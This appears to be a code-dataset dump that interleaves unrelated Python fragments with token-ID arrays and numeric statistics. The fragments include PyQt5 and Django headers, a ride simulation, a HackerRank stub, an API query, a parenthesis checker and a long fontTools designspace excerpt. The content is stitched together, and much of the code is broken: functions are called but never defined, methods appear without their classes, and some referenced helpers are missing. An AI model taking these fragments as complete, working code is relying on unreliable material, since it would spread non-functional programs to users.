[ 11748, 1822, 29572, 198, 11748, 331, 43695, 198, 11748, 25064, 198, 6738, 764, 10414, 1330, 337, 893, 13976, 18546, 198, 6738, 9195, 13, 9945, 1330, 48761, 198, 198, 48610, 796, 1822, 29572, 13, 28100, 1713, 46677, 3419, 198, 48610, 13, ...
3.384615
78
# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'design.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


from PyQt5 import QtCore, QtGui, QtWidgets
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 201, 198, 2, 5178, 7822, 7560, 422, 3555, 334, 72, 2393, 705, 26124, 13, 9019, 6, 201, 198, 2, 201, 198, 2, 15622, 416, 25, 9485, 48, 83, 20, 12454, 2438, 173...
2.804878
123
from simulation.car import spawn_drivers
from simulation.passenger import spawn_passengers
from simulation.core import World, Clock

conf = {
    "x": 100,
    "y": 100,
    "drivers": 200,
    "users": 1000,
    "start": "2019-07-08T00:00:00",
    "end": "2019-07-08T00:01:00"
}

clock = Clock(conf["start"], conf["end"])

if __name__ == '__main__':
    world = World([conf['x'], conf['y']], clock=clock)
    world.register_drivers(spawn_drivers(conf["drivers"], conf['x'], conf['y']))
    world.register_passengers(spawn_passengers(conf["users"], conf['x'], conf['y']))
    world.run(log=False)
[ 6738, 18640, 13, 7718, 1330, 10922, 62, 36702, 198, 6738, 18640, 13, 6603, 6540, 1330, 10922, 62, 6603, 9302, 198, 6738, 18640, 13, 7295, 1330, 2159, 11, 21328, 198, 198, 10414, 796, 1391, 198, 220, 220, 220, 366, 87, 1298, 1802, 11, ...
2.584416
231
#!/bin/python3

import math
import os
import random
import re
import sys


#
# Complete the 'reverse_words_order_and_swap_cases' function below.
#
# The function is expected to return a STRING.
# The function accepts STRING sentence as parameter.
#

sentence = input()

news = reverse_words_order_and_swap_cases(sentence)

print(news)
[ 2, 48443, 8800, 14, 29412, 18, 198, 198, 11748, 10688, 198, 11748, 28686, 198, 11748, 4738, 198, 11748, 302, 198, 11748, 25064, 628, 198, 2, 198, 2, 13248, 262, 705, 50188, 62, 10879, 62, 2875, 62, 392, 62, 2032, 499, 62, 33964, 6, ...
3.180952
105
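The stub in the row above calls reverse_words_order_and_swap_cases without defining it. One plausible implementation is sketched below; the behaviour (reverse the word order, swap letter case) is inferred from the function name and the stub's comments, not given in the row itself.

# Hypothetical completion of the stub above.
def reverse_words_order_and_swap_cases(sentence):
    return " ".join(reversed(sentence.split())).swapcase()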
import json

d1 = {}
with open("/home/qinyuan/zs/out/bart-large-with-description-grouped-1e-5-outerbsz4-innerbsz32-adapterdim4-unfreeze-dec29/test_predictions.jsonl") as fin:
    for line in fin:
        d = json.loads(line)
        d1[d["id"]] = d["output"][0]["answer"]

d2 = {}
dq = {}
with open("/home/qinyuan/zs/out/bart-large-zsre-with-description-LR2e-5-FREQ32-dec27/test_predictions_submitted.jsonl") as fin:
    for line in fin:
        d = json.loads(line)
        d2[d["id"]] = d["output"][0]["answer"]
        dq[d["id"]] = d["input"]

d3 = {}
with open("/home/qinyuan/zs/data/structured_zeroshot-test.jsonl") as fin:
    for line in fin:
        d = json.loads(line)
        d3[d["id"]] = [item["answer"] for item in d["output"]]

count = 0
win1 = 0
win2 = 0
for key in d1.keys():
    if d1[key] != d2[key]:
        print("{}. {}. {}. {}. {}".format(key, dq[key], d1[key], d2[key], d3[key]))
        count += 1
        if d1[key] in d3[key] and d2[key] not in d3[key]:
            win1 += 1
            print(d1[key])
            print(d2[key])
        if d2[key] in d3[key] and d1[key] not in d3[key]:
            win2 += 1
            print(d1[key])
            print(d2[key])

print(count)
print(win1)
print(win2)
[ 11748, 33918, 198, 198, 67, 16, 796, 23884, 198, 4480, 1280, 7203, 14, 11195, 14, 80, 3541, 7258, 14, 89, 82, 14, 448, 14, 16575, 12, 11664, 12, 4480, 12, 11213, 12, 8094, 276, 12, 16, 68, 12, 20, 12, 39605, 1443, 89, 19, 12, ...
1.886364
660
import json, requests
from pprint import pprint

CREEDS_URL = 'http://amp.pharm.mssm.edu/CREEDS/'

response = requests.get(CREEDS_URL + 'search', params={'q': 'STAT3'})
if response.status_code == 200:
    pprint(response.json())
    json.dump(response.json(), open('api1_result.json', 'wb'), indent=4)
[ 11748, 33918, 11, 7007, 198, 6738, 279, 4798, 1330, 279, 4798, 198, 198, 43387, 1961, 50, 62, 21886, 796, 705, 4023, 1378, 696, 13, 746, 1670, 13, 76, 824, 76, 13, 15532, 14, 43387, 1961, 50, 14, 6, 198, 26209, 796, 7007, 13, 1136...
2.672727
110
# Generated by Django 2.2.3 on 2019-07-31 13:54

from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 362, 13, 17, 13, 18, 319, 13130, 12, 2998, 12, 3132, 1511, 25, 4051, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
# Forma sem bugs
expressao = (str(input('Digite a expressão: ')))
pilhaParenteses = []
for v in expressao:
    if v == '(':
        pilhaParenteses.append('(')
    elif v == ')':
        if len(pilhaParenteses) > 0:
            pilhaParenteses.pop()
        else:
            pilhaParenteses.append(')')
            break
if len(pilhaParenteses) == 0:
    print(f'A expressão {expressao} está válida.')
else:
    print(f'A expressão {expressao} está inválida!')

# Forma com bugs
#expressao = (str(input('Digite a expressão: ')))
#if expressao.count('(') == expressao.count(')'):
#    print('Sua expressão está válida.')
#else:
#    print('Sua expressão está inválida!')
[ 2, 220, 5178, 64, 5026, 11316, 198, 42712, 5488, 796, 357, 2536, 7, 15414, 10786, 19511, 578, 257, 1033, 33852, 25, 705, 22305, 198, 79, 346, 3099, 24546, 274, 274, 796, 17635, 198, 1640, 410, 287, 4911, 5488, 25, 198, 220, 220, 220...
2.160656
305
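The row above contrasts a stack-based parenthesis check ("Forma sem bugs") with a pure counting check ("Forma com bugs"). A short hypothetical helper wrapping the same stack logic makes the difference concrete: ')(' has equal counts of '(' and ')' but is not balanced.

# Compact variant of the stack check above; names are illustrative only.
def balanced(expr):
    stack = []
    for ch in expr:
        if ch == '(':
            stack.append(ch)
        elif ch == ')':
            if stack:
                stack.pop()
            else:
                return False
    return not stack

assert balanced('(a + b) * (c - d)')
assert not balanced(')(')  # counting '(' vs ')' would wrongly accept this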
# Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany
# Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory

import logging
from xml.sax.saxutils import escape

log = logging.getLogger()
[ 2, 15069, 2864, 309, 10503, 8987, 41005, 402, 2022, 39, 11, 791, 353, 69, 71, 1806, 11, 4486, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 532, 766, 38559, 24290, 13, 9132, 287, 1628, 6808, 8619, 198, 198, 11748, ...
3.573529
68
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
import plotly.express as px
from plotly.subplots import make_subplots
import pandas as pd
import math

from datetime import datetime, time
from utils import MONTH_NAMES, month_range

"""
TODO: Terminar el heatmap de alguna manera...
def fig_uses(df, months):
    dias = ['Lunes', 'Martes', 'Miércoles', 'Jueves', 'Viernes']
    days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']
    data = df[df.index.month.isin(month_range(months))]
    figure = go.Figure()
    times = data.groupby([data.index.weekday_name, pd.Grouper(freq='60min', key='Hora Inicio')]).fillna(0).sum().reset_index()
    day_times = times[times['Marca temporal'] == 'Monday']['Hora Inicio'].dt.time
    z_dict = dict()
    for i, d in enumerate(days):
        z_dict.update({dias[i]: times[times['Marca temporal'] == d]['Tiempo de uso en minutos'].fillna(0).values})
    z_values = pd.DataFrame(z_dict).values
    figure.add_trace(go.Heatmap(
        x=dias,
        y=day_times,
        z=z_values))
    return figure
"""

#def uses(df, months):
#    return dcc.Graph(figure=fig_uses(df, months), style={'height': '80vh'})
[ 11748, 14470, 62, 7295, 62, 5589, 3906, 355, 288, 535, 198, 11748, 14470, 62, 6494, 62, 5589, 3906, 355, 27711, 198, 11748, 7110, 306, 13, 34960, 62, 672, 8457, 355, 467, 198, 11748, 7110, 306, 13, 42712, 355, 279, 87, 198, 6738, 71...
2.490722
485
# -*- coding: utf-8 -*-
from gengine.app.tests.base import BaseDBTest
from gengine.app.tests.helpers import create_user, update_user, delete_user, get_or_create_language
from gengine.metadata import DBSession
from gengine.app.model import AuthUser
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 308, 18392, 13, 1324, 13, 41989, 13, 8692, 1330, 7308, 11012, 14402, 198, 6738, 308, 18392, 13, 1324, 13, 41989, 13, 16794, 364, 1330, 2251, 62, 7220, 11, 4296, ...
3.060241
83
from __future__ import annotations import collections import copy import itertools import math import os import posixpath from io import BytesIO, StringIO from textwrap import indent from typing import Any, Dict, List, MutableMapping, Optional, Tuple, Union from fontTools.misc import etree as ET from fontTools.misc import plistlib from fontTools.misc.loggingTools import LogMixin from fontTools.misc.textTools import tobytes, tostr """ designSpaceDocument - read and write designspace files """ __all__ = [ 'DesignSpaceDocumentError', 'DesignSpaceDocument', 'SourceDescriptor', 'InstanceDescriptor', 'AxisDescriptor', 'RuleDescriptor', 'BaseDocReader', 'BaseDocWriter' ] # ElementTree allows to find namespace-prefixed elements, but not attributes # so we have to do it ourselves for 'xml:lang' XML_NS = "{http://www.w3.org/XML/1998/namespace}" XML_LANG = XML_NS + "lang" def posix(path): """Normalize paths using forward slash to work also on Windows.""" new_path = posixpath.join(*path.split(os.path.sep)) if path.startswith('/'): # The above transformation loses absolute paths new_path = '/' + new_path elif path.startswith(r'\\'): # The above transformation loses leading slashes of UNC path mounts new_path = '//' + new_path return new_path def posixpath_property(private_name): """Generate a propery that holds a path always using forward slashes.""" return property(getter, setter) def getFamilyName(self, languageCode="en"): """Getter for :attr:`localisedFamilyName` .. versionadded:: 5.0 """ return self.localisedFamilyName.get(languageCode) def getFullDesignLocation(self, doc: 'DesignSpaceDocument') -> AnisotropicLocationDict: """Get the complete design location of this source, from its :attr:`designLocation` and the document's axis defaults. .. versionadded:: 5.0 """ result: AnisotropicLocationDict = {} for axis in doc.axes: if axis.name in self.designLocation: result[axis.name] = self.designLocation[axis.name] else: result[axis.name] = axis.map_forward(axis.default) return result class RuleDescriptor(SimpleDescriptor): """Represents the rule descriptor element: a set of glyph substitutions to trigger conditionally in some parts of the designspace. .. code:: python r1 = RuleDescriptor() r1.name = "unique.rule.name" r1.conditionSets.append([dict(name="weight", minimum=-10, maximum=10), dict(...)]) r1.conditionSets.append([dict(...), dict(...)]) r1.subs.append(("a", "a.alt")) .. code:: xml <!-- optional: list of substitution rules --> <rules> <rule name="vertical.bars"> <conditionset> <condition minimum="250.000000" maximum="750.000000" name="weight"/> <condition minimum="100" name="width"/> <condition minimum="10" maximum="40" name="optical"/> </conditionset> <sub name="cent" with="cent.alt"/> <sub name="dollar" with="dollar.alt"/> </rule> </rules> """ _attrs = ['name', 'conditionSets', 'subs'] # what do we need here def evaluateRule(rule, location): """Return True if any of the rule's conditionsets matches the given location.""" return any(evaluateConditions(c, location) for c in rule.conditionSets) def evaluateConditions(conditions, location): """Return True if all the conditions matches the given location. - If a condition has no minimum, check for < maximum. - If a condition has no maximum, check for > minimum. 
""" for cd in conditions: value = location[cd['name']] if cd.get('minimum') is None: if value > cd['maximum']: return False elif cd.get('maximum') is None: if cd['minimum'] > value: return False elif not cd['minimum'] <= value <= cd['maximum']: return False return True def processRules(rules, location, glyphNames): """Apply these rules at this location to these glyphnames. Return a new list of glyphNames with substitutions applied. - rule order matters """ newNames = [] for rule in rules: if evaluateRule(rule, location): for name in glyphNames: swap = False for a, b in rule.subs: if name == a: swap = True break if swap: newNames.append(b) else: newNames.append(name) glyphNames = newNames newNames = [] return glyphNames AnisotropicLocationDict = Dict[str, Union[float, Tuple[float, float]]] SimpleLocationDict = Dict[str, float] def clearLocation(self, axisName: Optional[str] = None): """Clear all location-related fields. Ensures that :attr:``designLocation`` and :attr:``userLocation`` are dictionaries (possibly empty if clearing everything). In order to update the location of this instance wholesale, a user should first clear all the fields, then change the field(s) for which they have data. .. code:: python instance.clearLocation() instance.designLocation = {'Weight': (34, 36.5), 'Width': 100} instance.userLocation = {'Opsz': 16} In order to update a single axis location, the user should only clear that axis, then edit the values: .. code:: python instance.clearLocation('Weight') instance.designLocation['Weight'] = (34, 36.5) Args: axisName: if provided, only clear the location for that axis. .. versionadded:: 5.0 """ self.locationLabel = None if axisName is None: self.designLocation = {} self.userLocation = {} else: if self.designLocation is None: self.designLocation = {} if axisName in self.designLocation: del self.designLocation[axisName] if self.userLocation is None: self.userLocation = {} if axisName in self.userLocation: del self.userLocation[axisName] def getLocationLabelDescriptor(self, doc: 'DesignSpaceDocument') -> Optional[LocationLabelDescriptor]: """Get the :class:`LocationLabelDescriptor` instance that matches this instances's :attr:`locationLabel`. Raises if the named label can't be found. .. versionadded:: 5.0 """ if self.locationLabel is None: return None label = doc.getLocationLabel(self.locationLabel) if label is None: raise DesignSpaceDocumentError( 'InstanceDescriptor.getLocationLabelDescriptor(): ' f'unknown location label `{self.locationLabel}` in instance `{self.name}`.' ) return label def getFullDesignLocation(self, doc: 'DesignSpaceDocument') -> AnisotropicLocationDict: """Get the complete design location of this instance, by combining data from the various location fields, default axis values and mappings, and top-level location labels. The source of truth for this instance's location is determined for each axis independently by taking the first not-None field in this list: - ``locationLabel``: the location along this axis is the same as the matching STAT format 4 label. No anisotropy. - ``designLocation[axisName]``: the explicit design location along this axis, possibly anisotropic. - ``userLocation[axisName]``: the explicit user location along this axis. No anisotropy. - ``axis.default``: default axis value. No anisotropy. .. 
versionadded:: 5.0 """ label = self.getLocationLabelDescriptor(doc) if label is not None: return doc.map_forward(label.userLocation) # type: ignore result: AnisotropicLocationDict = {} for axis in doc.axes: if axis.name in self.designLocation: result[axis.name] = self.designLocation[axis.name] elif axis.name in self.userLocation: result[axis.name] = axis.map_forward(self.userLocation[axis.name]) else: result[axis.name] = axis.map_forward(axis.default) return result def getFullUserLocation(self, doc: 'DesignSpaceDocument') -> SimpleLocationDict: """Get the complete user location for this instance. .. seealso:: :meth:`getFullDesignLocation` .. versionadded:: 5.0 """ return doc.map_backward(self.getFullDesignLocation(doc)) def tagForAxisName(name): # try to find or make a tag name for this axis name names = { 'weight': ('wght', dict(en = 'Weight')), 'width': ('wdth', dict(en = 'Width')), 'optical': ('opsz', dict(en = 'Optical Size')), 'slant': ('slnt', dict(en = 'Slant')), 'italic': ('ital', dict(en = 'Italic')), } if name.lower() in names: return names[name.lower()] if len(name) < 4: tag = name + "*" * (4 - len(name)) else: tag = name[:4] return tag, dict(en=name) class AbstractAxisDescriptor(SimpleDescriptor): flavor = "axis" class AxisDescriptor(AbstractAxisDescriptor): """ Simple container for the axis data. Add more localisations? .. code:: python a1 = AxisDescriptor() a1.minimum = 1 a1.maximum = 1000 a1.default = 400 a1.name = "weight" a1.tag = "wght" a1.labelNames['fa-IR'] = "" a1.labelNames['en'] = "Wght" a1.map = [(1.0, 10.0), (400.0, 66.0), (1000.0, 990.0)] a1.axisOrdering = 1 a1.axisLabels = [ AxisLabelDescriptor(name="Regular", userValue=400, elidable=True) ] doc.addAxis(a1) """ _attrs = ['tag', 'name', 'maximum', 'minimum', 'default', 'map', 'axisOrdering', 'axisLabels'] def map_forward(self, v): """Maps value from axis mapping's input (user) to output (design).""" from fontTools.varLib.models import piecewiseLinearMap if not self.map: return v return piecewiseLinearMap(v, {k: v for k, v in self.map}) def map_backward(self, v): """Maps value from axis mapping's output (design) to input (user).""" from fontTools.varLib.models import piecewiseLinearMap if isinstance(v, tuple): v = v[0] if not self.map: return v return piecewiseLinearMap(v, {v: k for k, v in self.map}) class DiscreteAxisDescriptor(AbstractAxisDescriptor): """Container for discrete axis data. Use this for axes that do not interpolate. The main difference from a continuous axis is that a continuous axis has a ``minimum`` and ``maximum``, while a discrete axis has a list of ``values``. Example: an Italic axis with 2 stops, Roman and Italic, that are not compatible. The axis still allows to bind together the full font family, which is useful for the STAT table, however it can't become a variation axis in a VF. .. code:: python a2 = DiscreteAxisDescriptor() a2.values = [0, 1] a2.name = "Italic" a2.tag = "ITAL" a2.labelNames['fr'] = "Italique" a2.map = [(0, 0), (1, -11)] a2.axisOrdering = 2 a2.axisLabels = [ AxisLabelDescriptor(name="Roman", userValue=0, elidable=True) ] doc.addAxis(a2) .. versionadded:: 5.0 """ flavor = "axis" _attrs = ('tag', 'name', 'values', 'default', 'map', 'axisOrdering', 'axisLabels') def map_forward(self, value): """Maps value from axis mapping's input to output. Returns value unchanged if no mapping entry is found. Note: for discrete axes, each value must have its mapping entry, if you intend that value to be mapped. 
""" return next((v for k, v in self.map if k == value), value) def map_backward(self, value): """Maps value from axis mapping's output to input. Returns value unchanged if no mapping entry is found. Note: for discrete axes, each value must have its mapping entry, if you intend that value to be mapped. """ if isinstance(value, tuple): value = value[0] return next((k for k, v in self.map if v == value), value) class AxisLabelDescriptor(SimpleDescriptor): """Container for axis label data. Analogue of OpenType's STAT data for a single axis (formats 1, 2 and 3). All values are user values. See: `OTSpec STAT Axis value table, format 1, 2, 3 <https://docs.microsoft.com/en-us/typography/opentype/spec/stat#axis-value-table-format-1>`_ The STAT format of the Axis value depends on which field are filled-in, see :meth:`getFormat` .. versionadded:: 5.0 """ flavor = "label" _attrs = ('userMinimum', 'userValue', 'userMaximum', 'name', 'elidable', 'olderSibling', 'linkedUserValue', 'labelNames') def getFormat(self) -> int: """Determine which format of STAT Axis value to use to encode this label. =========== ========= =========== =========== =============== STAT Format userValue userMinimum userMaximum linkedUserValue =========== ========= =========== =========== =============== 1 2 3 =========== ========= =========== =========== =============== """ if self.linkedUserValue is not None: return 3 if self.userMinimum is not None or self.userMaximum is not None: return 2 return 1 def write(self, pretty=True, encoding="UTF-8", xml_declaration=True): self.root.attrib['format'] = ".".join(str(i) for i in self.effectiveFormatTuple) if self.documentObject.axes or self.documentObject.elidedFallbackName is not None: axesElement = ET.Element("axes") if self.documentObject.elidedFallbackName is not None: axesElement.attrib['elidedfallbackname'] = self.documentObject.elidedFallbackName self.root.append(axesElement) for axisObject in self.documentObject.axes: self._addAxis(axisObject) if self.documentObject.locationLabels: labelsElement = ET.Element("labels") for labelObject in self.documentObject.locationLabels: self._addLocationLabel(labelsElement, labelObject) self.root.append(labelsElement) if self.documentObject.rules: if getattr(self.documentObject, "rulesProcessingLast", False): attributes = {"processing": "last"} else: attributes = {} self.root.append(ET.Element("rules", attributes)) for ruleObject in self.documentObject.rules: self._addRule(ruleObject) if self.documentObject.sources: self.root.append(ET.Element("sources")) for sourceObject in self.documentObject.sources: self._addSource(sourceObject) if self.documentObject.variableFonts: variableFontsElement = ET.Element("variable-fonts") for variableFont in self.documentObject.variableFonts: self._addVariableFont(variableFontsElement, variableFont) self.root.append(variableFontsElement) if self.documentObject.instances: self.root.append(ET.Element("instances")) for instanceObject in self.documentObject.instances: self._addInstance(instanceObject) if self.documentObject.lib: self._addLib(self.root, self.documentObject.lib, 2) tree = ET.ElementTree(self.root) tree.write( self.path, encoding=encoding, method='xml', xml_declaration=xml_declaration, pretty_print=pretty, ) def _getEffectiveFormatTuple(self): """Try to use the version specified in the document, or a sufficiently recent version to be able to encode what the document contains. 
""" minVersion = self.documentObject.formatTuple if ( any( isinstance(axis, DiscreteAxisDescriptor) or axis.axisOrdering is not None or axis.axisLabels for axis in self.documentObject.axes ) or self.documentObject.locationLabels or any( source.localisedFamilyName for source in self.documentObject.sources ) or self.documentObject.variableFonts or any( instance.locationLabel or instance.userLocation for instance in self.documentObject.instances ) ): if minVersion < (5, 0): minVersion = (5, 0) return minVersion def _makeLocationElement(self, locationObject, name=None): """ Convert Location dict to a locationElement.""" locElement = ET.Element("location") if name is not None: locElement.attrib['name'] = name validatedLocation = self.documentObject.newDefaultLocation() for axisName, axisValue in locationObject.items(): if axisName in validatedLocation: # only accept values we know validatedLocation[axisName] = axisValue for dimensionName, dimensionValue in validatedLocation.items(): dimElement = ET.Element('dimension') dimElement.attrib['name'] = dimensionName if type(dimensionValue) == tuple: dimElement.attrib['xvalue'] = self.intOrFloat(dimensionValue[0]) dimElement.attrib['yvalue'] = self.intOrFloat(dimensionValue[1]) else: dimElement.attrib['xvalue'] = self.intOrFloat(dimensionValue) locElement.append(dimElement) return locElement, validatedLocation def intOrFloat(self, num): if int(num) == num: return "%d" % num return ("%f" % num).rstrip('0').rstrip('.') def _addRule(self, ruleObject): # if none of the conditions have minimum or maximum values, do not add the rule. ruleElement = ET.Element('rule') if ruleObject.name is not None: ruleElement.attrib['name'] = ruleObject.name for conditions in ruleObject.conditionSets: conditionsetElement = ET.Element('conditionset') for cond in conditions: if cond.get('minimum') is None and cond.get('maximum') is None: # neither is defined, don't add this condition continue conditionElement = ET.Element('condition') conditionElement.attrib['name'] = cond.get('name') if cond.get('minimum') is not None: conditionElement.attrib['minimum'] = self.intOrFloat(cond.get('minimum')) if cond.get('maximum') is not None: conditionElement.attrib['maximum'] = self.intOrFloat(cond.get('maximum')) conditionsetElement.append(conditionElement) if len(conditionsetElement): ruleElement.append(conditionsetElement) for sub in ruleObject.subs: subElement = ET.Element('sub') subElement.attrib['name'] = sub[0] subElement.attrib['with'] = sub[1] ruleElement.append(subElement) if len(ruleElement): self.root.findall('.rules')[0].append(ruleElement) class BaseDocReader(LogMixin): axisDescriptorClass = AxisDescriptor discreteAxisDescriptorClass = DiscreteAxisDescriptor axisLabelDescriptorClass = AxisLabelDescriptor locationLabelDescriptorClass = LocationLabelDescriptor ruleDescriptorClass = RuleDescriptor sourceDescriptorClass = SourceDescriptor variableFontsDescriptorClass = VariableFontDescriptor valueAxisSubsetDescriptorClass = ValueAxisSubsetDescriptor rangeAxisSubsetDescriptorClass = RangeAxisSubsetDescriptor instanceDescriptorClass = InstanceDescriptor def locationFromElement(self, element): """Read a nested ``<location>`` element inside the given ``element``. .. 
versionchanged:: 5.0 Return a tuple of (designLocation, userLocation) """ elementLocation = (None, None) for locationElement in element.findall('.location'): elementLocation = self.readLocationElement(locationElement) break return elementLocation def readLocationElement(self, locationElement): """Read a ``<location>`` element. .. versionchanged:: 5.0 Return a tuple of (designLocation, userLocation) """ if self._strictAxisNames and not self.documentObject.axes: raise DesignSpaceDocumentError("No axes defined") userLoc = {} designLoc = {} for dimensionElement in locationElement.findall(".dimension"): dimName = dimensionElement.attrib.get("name") if self._strictAxisNames and dimName not in self.axisDefaults: # In case the document contains no axis definitions, self.log.warning("Location with undefined axis: \"%s\".", dimName) continue userValue = xValue = yValue = None try: userValue = dimensionElement.attrib.get('uservalue') if userValue is not None: userValue = float(userValue) except ValueError: self.log.warning("ValueError in readLocation userValue %3.3f", userValue) try: xValue = dimensionElement.attrib.get('xvalue') if xValue is not None: xValue = float(xValue) except ValueError: self.log.warning("ValueError in readLocation xValue %3.3f", xValue) try: yValue = dimensionElement.attrib.get('yvalue') if yValue is not None: yValue = float(yValue) except ValueError: self.log.warning("ValueError in readLocation yValue %3.3f", yValue) if userValue is None == xValue is None: raise DesignSpaceDocumentError(f'Exactly one of uservalue="" or xvalue="" must be provided for location dimension "{dimName}"') if yValue is not None: if xValue is None: raise DesignSpaceDocumentError(f'Missing xvalue="" for the location dimension "{dimName}"" with yvalue="{yValue}"') designLoc[dimName] = (xValue, yValue) elif xValue is not None: designLoc[dimName] = xValue else: userLoc[dimName] = userValue return designLoc, userLoc def readLibElement(self, libElement, instanceObject): """Read the lib element for the given instance.""" instanceObject.lib = plistlib.fromtree(libElement[0]) def readInfoElement(self, infoElement, instanceObject): """ Read the info element.""" instanceObject.info = True def readGlyphElement(self, glyphElement, instanceObject): """ Read the glyph element, which could look like either one of these: .. code-block:: xml <glyph name="b" unicode="0x62"/> <glyph name="b"/> <glyph name="b"> <master location="location-token-bbb" source="master-token-aaa2"/> <master glyphname="b.alt1" location="location-token-ccc" source="master-token-aaa3"/> <note> This is an instance from an anisotropic interpolation. 
</note> </glyph> """ glyphData = {} glyphName = glyphElement.attrib.get('name') if glyphName is None: raise DesignSpaceDocumentError("Glyph object without name attribute") mute = glyphElement.attrib.get("mute") if mute == "1": glyphData['mute'] = True # unicode unicodes = glyphElement.attrib.get('unicode') if unicodes is not None: try: unicodes = [int(u, 16) for u in unicodes.split(" ")] glyphData['unicodes'] = unicodes except ValueError: raise DesignSpaceDocumentError("unicode values %s are not integers" % unicodes) for noteElement in glyphElement.findall('.note'): glyphData['note'] = noteElement.text break designLocation, userLocation = self.locationFromElement(glyphElement) if userLocation: raise DesignSpaceDocumentError(f'<glyph> element "{glyphName}" must only have design locations (using xvalue="").') if designLocation is not None: glyphData['instanceLocation'] = designLocation glyphSources = None for masterElement in glyphElement.findall('.masters/master'): fontSourceName = masterElement.attrib.get('source') designLocation, userLocation = self.locationFromElement(masterElement) if userLocation: raise DesignSpaceDocumentError(f'<master> element "{fontSourceName}" must only have design locations (using xvalue="").') masterGlyphName = masterElement.attrib.get('glyphname') if masterGlyphName is None: # if we don't read a glyphname, use the one we have masterGlyphName = glyphName d = dict(font=fontSourceName, location=designLocation, glyphName=masterGlyphName) if glyphSources is None: glyphSources = [] glyphSources.append(d) if glyphSources is not None: glyphData['masters'] = glyphSources instanceObject.glyphs[glyphName] = glyphData def readLib(self): """Read the lib element for the whole document.""" for libElement in self.root.findall(".lib"): self.documentObject.lib = plistlib.fromtree(libElement[0]) class DesignSpaceDocument(LogMixin, AsDictMixin): """The DesignSpaceDocument object can read and write ``.designspace`` data. It imports the axes, sources, variable fonts and instances to very basic **descriptor** objects that store the data in attributes. Data is added to the document by creating such descriptor objects, filling them with data and then adding them to the document. This makes it easy to integrate this object in different contexts. The **DesignSpaceDocument** object can be subclassed to work with different objects, as long as they have the same attributes. Reader and Writer objects can be subclassed as well. **Note:** Python attribute names are usually camelCased, the corresponding `XML <document-xml-structure>`_ attributes are usually all lowercase. .. code:: python from fontTools.designspaceLib import DesignSpaceDocument doc = DesignSpaceDocument.fromfile("some/path/to/my.designspace") doc.formatVersion doc.elidedFallbackName doc.axes doc.locationLabels doc.rules doc.rulesProcessingLast doc.sources doc.variableFonts doc.instances doc.lib """ def tostring(self, encoding=None): """Returns the designspace as a string. Default encoding ``utf-8``.""" if encoding is str or ( encoding is not None and encoding.lower() == "unicode" ): f = StringIO() xml_declaration = False elif encoding is None or encoding == "utf-8": f = BytesIO() encoding = "UTF-8" xml_declaration = True else: raise ValueError("unsupported encoding: '%s'" % encoding) writer = self.writerClass(f, self) writer.write(encoding=encoding, xml_declaration=xml_declaration) return f.getvalue() def read(self, path): """Read a designspace file from ``path`` and populates the fields of ``self`` with the data. 
""" if hasattr(path, "__fspath__"): # support os.PathLike objects path = path.__fspath__() self.path = path self.filename = os.path.basename(path) reader = self.readerClass(path, self) reader.read() if self.sources: self.findDefault() def write(self, path): """Write this designspace to ``path``.""" if hasattr(path, "__fspath__"): # support os.PathLike objects path = path.__fspath__() self.path = path self.filename = os.path.basename(path) self.updatePaths() writer = self.writerClass(path, self) writer.write() def updatePaths(self): """ Right before we save we need to identify and respond to the following situations: In each descriptor, we have to do the right thing for the filename attribute. :: case 1. descriptor.filename == None descriptor.path == None -- action: write as is, descriptors will not have a filename attr. useless, but no reason to interfere. case 2. descriptor.filename == "../something" descriptor.path == None -- action: write as is. The filename attr should not be touched. case 3. descriptor.filename == None descriptor.path == "~/absolute/path/there" -- action: calculate the relative path for filename. We're not overwriting some other value for filename, it should be fine case 4. descriptor.filename == '../somewhere' descriptor.path == "~/absolute/path/there" -- action: there is a conflict between the given filename, and the path. So we know where the file is relative to the document. Can't guess why they're different, we just choose for path to be correct and update filename. """ assert self.path is not None for descriptor in self.sources + self.instances: if descriptor.path is not None: # case 3 and 4: filename gets updated and relativized descriptor.filename = self._posixRelativePath(descriptor.path) def addSource(self, sourceDescriptor: SourceDescriptor): """Add the given ``sourceDescriptor`` to ``doc.sources``.""" self.sources.append(sourceDescriptor) def addSourceDescriptor(self, **kwargs): """Instantiate a new :class:`SourceDescriptor` using the given ``kwargs`` and add it to ``doc.sources``. """ source = self.writerClass.sourceDescriptorClass(**kwargs) self.addSource(source) return source def addInstance(self, instanceDescriptor: InstanceDescriptor): """Add the given ``instanceDescriptor`` to :attr:`instances`.""" self.instances.append(instanceDescriptor) def addInstanceDescriptor(self, **kwargs): """Instantiate a new :class:`InstanceDescriptor` using the given ``kwargs`` and add it to :attr:`instances`. """ instance = self.writerClass.instanceDescriptorClass(**kwargs) self.addInstance(instance) return instance def addAxis(self, axisDescriptor: Union[AxisDescriptor, DiscreteAxisDescriptor]): """Add the given ``axisDescriptor`` to :attr:`axes`.""" self.axes.append(axisDescriptor) def addAxisDescriptor(self, **kwargs): """Instantiate a new :class:`AxisDescriptor` using the given ``kwargs`` and add it to :attr:`axes`. The axis will be and instance of :class:`DiscreteAxisDescriptor` if the ``kwargs`` provide a ``value``, or a :class:`AxisDescriptor` otherwise. """ if "values" in kwargs: axis = self.writerClass.discreteAxisDescriptorClass(**kwargs) else: axis = self.writerClass.axisDescriptorClass(**kwargs) self.addAxis(axis) return axis def addRule(self, ruleDescriptor: RuleDescriptor): """Add the given ``ruleDescriptor`` to :attr:`rules`.""" self.rules.append(ruleDescriptor) def addRuleDescriptor(self, **kwargs): """Instantiate a new :class:`RuleDescriptor` using the given ``kwargs`` and add it to :attr:`rules`. 
